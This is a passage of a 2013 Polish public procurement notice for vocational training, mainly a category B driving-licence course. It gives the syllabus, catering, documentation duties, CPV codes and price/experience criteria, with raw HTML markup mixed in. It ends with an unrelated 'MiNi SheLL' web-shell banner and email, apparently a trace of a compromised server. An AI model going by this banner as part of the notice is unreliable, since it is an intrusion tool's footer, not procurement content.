Materiały szkoleniowe	Każdy uczestnik kursu musi mieć zapewnione przez Wykonawcę wszystkie niezbędne materiały i narzędzia do odbycia kursu (wszystkie materiały dla beneficjentów muszą zawierać logotypy) oraz musi otrzymać na własność: program kursu i harmonogram zajęć, materiały szkoleniowe zgodne z tematyką kursu (jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej) oraz materiały biurowe (teczka papierowa formatu A4, zeszyt i długopis)

Warunki szkolenia	Wykonawca prowadzi dokumentację z zajęć w tym : dziennika zajęć, listy obecności uczestnika szkolenia, listy potwierdzającej korzystanie uczestnika szkolenia z posiłków, listy potwierdzającej odbiór materiałów dydaktycznych i piśmienniczych, list potwierdzającej odbiór zaświadczeń o ukończeniu i uczestnictwie w szkoleniu.
Wykonawca prowadzi zajęcia zgodnie z przepisami bhp w tym zakresie. Wykonawca zapewni uczestnikom kursu odzież ochronną, jeżeli konieczność taka wynika z obowiązujących przepisów bhp. 
Usługa gastronomiczna	Wykonawca musi zapewnić podczas zajęć teoretycznych i praktycznych na kursie barek kawowy oraz obiad jednodaniowy dla każdego uczestnika kursu zawodowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Prawo jazdy kat. B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób	4 osoby
Ilość godzin dydaktycznych    (1 godzina= 45min)	60 godzin w tym: 30 godzin zajęć teoretycznych  i 30 godzin zajęć  praktycznych.
Dojazd do miejsca realizacji kursu	Cena dojazdu beneficjentów do miejsca realizacji kursu powinna być
wkalkulowana w cenę ofertową
Termin zajęć	IX - 2013r. do XI - 2013 r.
Program powinien zawierać wskazane poniżej minimum programowe	Wykonawca zrealizuje kurs w oparciu o program szkolenia spełniający zasady i warunki podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego osób dorosłych, a także spełniający określone dla tych zawodów standardy kwalifikacji i szkolenia.

Program szkolenia teoretycznego:
- Budowa, obsługa i eksploatacja samochodu osobowego
- Ogólne zasady poruszania się samochodem po drodze:
zachowanie ostrożności i właściwej postawy w stosunku do innych uczestników ruchu drogowego
- Zasady zachowania bezpiecznych odległości między pojazdami
- Środki wpływające na percepcję i szybkość reakcji (alkohol,
narkotyki, leki), wpływ zmęczenia i stanu emocjonalnego na
zachowanie kierowcy
- Ocena warunków na drodze - warunki atmosferyczne,
widoczność, nawierzchnia, bezpieczna jazda samochodem w różnych warunkach
- Bezpieczne przewożenie pasażerów dorosłych i dzieci
- Znaki drogowe
- Ruszanie, włączanie się do ruchu, zatrzymanie, postój
- Manewry (wyprzedzanie, omijanie, wymijanie, zmiana pasa ruchu)
- Skrzyżowania, ronda, ruch kierowany
- Używanie świateł pojazdu
- Dokumentacja pojazdu, kontrola drogowa
- Udzielanie pierwszej pomocy
- Zasady postępowania w razie uczestniczenia w wypadku lub kolizji drogowej
- Błędy najczęściej popełniane przez kierowców
- Przygotowanie do egzaminu teoretycznego
- Egzamin wewnętrzny
Program szkolenia praktycznego:
- Budowa i obsługa samochodu
- Przygotowanie do jazdy, ruszanie, zatrzymanie, zmiana biegów
- Zmiana kierunku jazdy, cofanie
- Obsługa świateł
- Plac manewrowy - ćwiczenie umiejętności manewrowania pojazdem
- Jazda w terenie (dostosowanie prędkości do warunków na drodze, hamowanie awaryjne, bieg 5 i 6)
- Jazda w ruchu ulicznym (pasy ruchu, skrzyżowania, ronda, obserwowanie i przewidywanie działań innych uczestników
ruchu)
- Manewry w ruchu ulicznym (wyprzedzanie, omijanie, wymijanie, parkowanie)
- Jazda sportowa (wychodzenie z poślizgu, ostre wchodzenie w zakręty)
- Jazda z nawigacją
- Stacja benzynowa (tankowanie benzyny, oleju napędowego, gazu)
- Stacja kontroli pojazdów
- Czynności kontrolne na drodze
- Awaria na drodze (diagnostyka, zmiana koła, uzupełnienie płynów eksploatacyjnych)
- Plac manewrowy - przygotowanie do egzaminu
- Trasy egzaminacyjne - przygotowanie do egzaminu
- Egzamin wewnętrzny
Materiały szkoleniowe	Każdy uczestnik kursu musi mieć zapewnione przez Wykonawcę wszystkie niezbędne materiały i narzędzia do odbycia kursu (wszystkie
materiały dla beneficjentów musza zawierać logotypy) oraz musi otrzymać na własność: program kursu i harmonogram zajęć, materiały
szkoleniowe zgodne z tematyką kursu (jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej) oraz materiały
biurowe (teczka papierowa formatu A4, zeszyt i długopis)
Usługa gastronomiczna	Wykonawca musi zapewnić podczas zajęć teoretycznych na kursie barek kawowy oraz obiad jednodaniowy dla każdego uczestnika kursu zawodowego. 
Warunki szkolenia
	Wykonawca prowadzi dokumentację z zajęć w tym : dziennika zajęć, listy obecności uczestnika szkolenia, listy potwierdzającej korzystanie uczestnika szkolenia z posiłków, listy potwierdzającej odbiór materiałów dydaktycznych i piśmienniczych, list potwierdzającej odbiór zaświadczeń o ukończeniu i uczestnictwie w szkoleniu,
Wykonawca prowadzi zajęcia zgodnie z przepisami bhp w tym zakresie. Wykonawca zapewni uczestnikom kursu odzież ochronną, jeżeli konieczność taka wynika z obowiązujących przepisów bhp. 
Wykonawca ponosi koszt związany z opłatą za pierwszy egzamin państwowy, w/w koszt  proszę wkalkulować w cenę oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com